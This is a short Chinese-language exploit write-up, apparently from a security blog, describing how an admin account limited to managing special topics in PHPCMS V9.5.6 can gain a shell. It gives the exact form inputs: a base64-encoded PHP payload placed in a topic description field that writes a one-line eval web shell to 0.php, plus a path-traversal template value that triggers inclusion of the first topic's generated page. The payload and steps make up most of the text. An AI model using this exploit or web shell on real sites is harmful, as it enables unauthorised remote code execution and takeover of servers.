PHPCMS后台低权限拿SHELL
细说明:
前提是需要有管理专题的权限
测试版本
PHPCMS程序版本:Phpcms V9.5.6 Release 20140522
过程
1. 添加专题
专题名称:test
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>
生成静态:是
专题生成目录:test000
专题子分类:test test
其他默认 -> 提交
2. 再次添加专题
专题名称:test1
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
专题生成目录:test111
专题子分类:test test
扩展设置
专题模板:value设置为 ../../../../html/special/test000/index
其他默认 -> 提交
会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论